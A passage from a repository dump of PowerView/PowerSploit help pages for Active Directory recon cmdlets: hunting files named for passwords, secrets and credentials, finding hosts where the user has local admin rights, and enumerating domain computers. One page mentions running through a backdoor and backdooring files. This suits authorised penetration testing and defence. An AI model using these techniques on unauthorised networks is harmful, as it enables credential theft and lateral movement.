Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain and target systems.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.FoundFile\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-InterestingFile.md",
    "content": "# Find-InterestingFile\r\n\r\n## SYNOPSIS\r\nSearches for files on the given path that match a series of specified criteria.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection\r\n\r\n## SYNTAX\r\n\r\n### FileSpecification (Default)\r\n```\r\nFind-InterestingFile [[-Path] <String[]>] [-Include <String[]>] [-LastAccessTime <DateTime>]\r\n [-LastWriteTime <DateTime>] [-CreationTime <DateTime>] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess]\r\n [-Credential <PSCredential>]\r\n```\r\n\r\n### OfficeDocs\r\n```\r\nFind-InterestingFile [[-Path] <String[]>] [-OfficeDocs] [-CheckWriteAccess] [-Credential <PSCredential>]\r\n```\r\n\r\n### FreshEXEs\r\n```\r\nFind-InterestingFile [[-Path] <String[]>] [-FreshEXEs] [-CheckWriteAccess] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function recursively searches a given UNC path for files with\r\nspecific keywords in the name (default of pass, sensitive, secret, admin,\r\nlogin and unattend*.xml).\r\nBy default, hidden files/folders are included\r\nin search results.\r\nIf -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection\r\nis used to temporarily map the remote share.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-InterestingFile -Path \"C:\\Backup\\\"\r\n```\r\n\r\nReturns any files on the local path C:\\Backup\\ that have the default\r\nsearch term set in the title.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-InterestingFile -Path \"\\\\WINDOWS7\\Users\\\" -LastAccessTime (Get-Date).AddDays(-7)\r\n```\r\n\r\nReturns any files on the remote path \\\\\\\\WINDOWS7\\Users\\ that have the default\r\nsearch term set in the title and were accessed within the last week.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-InterestingFile -Credential $Cred -Path \"\\\\\\\\PRIMARY.testlab.local\\C$\\Temp\\\"\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\nUNC/local path to recursively search.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: .\\\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Include\r\nOnly return files/folders that match the specified array of strings,\r\ni.e.\r\n@(*.doc*, *.xls*, *.ppt*)\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: FileSpecification\r\nAliases: SearchTerms, Terms\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LastAccessTime\r\nOnly return files with a LastAccessTime greater than this date value.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LastWriteTime\r\nOnly return files with a LastWriteTime greater than this date value.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CreationTime\r\nOnly return files with a CreationTime greater than this date value.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OfficeDocs\r\nSwitch.\r\nSearch for office documents (*.doc*, *.xls*, *.ppt*)\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: OfficeDocs\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FreshEXEs\r\nSwitch.\r\nFind .EXEs accessed within the last 7 days.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: FreshEXEs\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludeFolders\r\nSwitch.\r\nExclude folders from the search results.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludeHidden\r\nSwitch.\r\nExclude hidden files and folders from the search results.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: FileSpecification\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CheckWriteAccess\r\nSwitch.\r\nOnly returns files the current user has write access to.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nto connect to remote systems for file enumeration.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.FoundFile\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-LocalAdminAccess.md",
    "content": "# Find-LocalAdminAccess\r\n\r\n## SYNOPSIS\r\nFinds machines on the local domain where the current user has local administrator access.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-LocalAdminAccess [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]\r\n [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]\r\n [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates all machines on the current (or specified) domain\r\nusing Get-DomainComputer, and for each computer it checks if the current user\r\nhas local administrator access using Test-AdminAccess.\r\nIf -Credential is passed,\r\nthen Invoke-UserImpersonation is used to impersonate the specified user\r\nbefore enumeration, reverting after with Invoke-RevertToSelf.\r\n\r\nIdea adapted from the local_admin_search_enum post module in Metasploit written by:\r\n    'Brandon McCann \"zeknox\" \\<bmccann\\[at\\]accuvant.com\\>'\r\n    'Thomas McCarthy \"smilingraccoon\" \\<smilingraccoon\\[at\\]gmail.com\\>'\r\n    'Royce Davis \"r3dy\" \\<rdavis\\[at\\]accuvant.com\\>'\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-LocalAdminAccess\r\n```\r\n\r\nFinds machines in the current domain the current user has admin access to.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-LocalAdminAccess -Domain dev.testlab.local\r\n```\r\n\r\nFinds machines in the dev.testlab.local domain the current user has admin access to.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-LocalAdminAccess -Domain testlab.local -Credential $Cred\r\n\r\nFinds machines in the testlab.local domain that the user with the specified -Credential\r\nhas admin access to.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\r\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\r\nin the domain returned by Get-DomainComputer.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerDomain\r\nSpecifies the domain to query for computers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerLDAPFilter\r\nSpecifies an LDAP query string that is used to search for computer objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSearchBase\r\nSpecifies the LDAP source to search through for computers,\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerOperatingSystem\r\nSearch computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: OperatingSystem\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerServicePack\r\nSearch computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePack\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSiteName\r\nSearch computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: SiteName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CheckShareAccess\r\nSwitch.\r\nOnly display found shares that the local user has access to.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain and target systems.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### String\r\n\r\nComputer dnshostnames the current user has administrative access to.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-ComputerDetail.md",
    "content": "# Get-ComputerDetail\r\n\r\n## SYNOPSIS\r\nThis script is used to get useful information from a computer.\r\n\r\nFunction: Get-ComputerDetail  \r\nAuthor: Joe Bialek, Twitter: @JosephBialek  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ComputerDetail [-ToString]\r\n```\r\n\r\n## DESCRIPTION\r\nThis script is used to get useful information from a computer.\r\nCurrently, the script gets the following information:\r\n-Explicit Credential Logons (Event ID 4648)\r\n-Logon events (Event ID 4624)\r\n-AppLocker logs to find what processes are created\r\n-PowerShell logs to find PowerShell scripts which have been executed\r\n-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ComputerDetail\r\n```\r\n\r\nGets information about the computer and outputs it as PowerShell objects.\r\n\r\nGet-ComputerDetail -ToString\r\nGets information about the computer and outputs it as raw text.\r\n\r\n## PARAMETERS\r\n\r\n### -ToString\r\nSwitch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nThis script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.\r\nYou can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.\r\n\r\n## RELATED LINKS\r\n\r\n[Blog: http://clymb3r.wordpress.com/\r\nGithub repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/\r\nGithub repo: https://github.com/clymb3r/PowerShell)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-Domain.md",
    "content": "# Get-Domain\r\n\r\n## SYNOPSIS\r\nReturns the domain object for the current (or specified) domain.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-Domain [[-Domain] <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns a System.DirectoryServices.ActiveDirectory.Domain object for the current\r\ndomain or the domain specified with -Domain X.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-Domain -Domain testlab.local\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-Domain -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain name to query for, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.DirectoryServices.ActiveDirectory.Domain\r\n\r\nA complex .NET domain object.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainComputer.md",
    "content": "# Get-DomainComputer\r\n\r\n## SYNOPSIS\r\nReturn all computers or specific computer objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainComputer [[-Identity] <String[]>] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN <String>]\r\n [-OperatingSystem <String>] [-ServicePack <String>] [-SiteName <String>] [-Ping] [-Domain <String>]\r\n [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]\r\n [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties samaccountname,usnchanged,...\".\r\nBy default, all computer objects for\r\nthe current domain are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainComputer\r\n```\r\n\r\nReturns the current computers in current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainComputer -SPN mssql* -Domain testlab.local\r\n```\r\n\r\nReturns all MS SQL servers in the testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer -SearchBase \"LDAP://OU=secret,DC=testlab,DC=local\" -Unconstrained\r\n```\r\n\r\nSearch the specified OU for computeres that allow unconstrained delegation.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainComputer -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nWINDOWS10$), DistinguishedName (e.g.\r\nCN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.\r\n4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\r\nor a dns host name (e.g.\r\nwindows10.testlab.local).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: SamAccountName, Name, DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Unconstrained\r\nSwitch.\r\nReturn computer objects that have unconstrained delegation.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -TrustedToAuth\r\nSwitch.\r\nReturn computer objects that are trusted to authenticate for other principals.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Printers\r\nSwitch.\r\nReturn only printers.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SPN\r\nReturn computers with a specific service principal name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePrincipalName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OperatingSystem\r\nReturn computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServicePack\r\nReturn computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SiteName\r\nReturn computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Ping\r\nSwitch.\r\nPing each host to ensure it's up before enumerating.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target 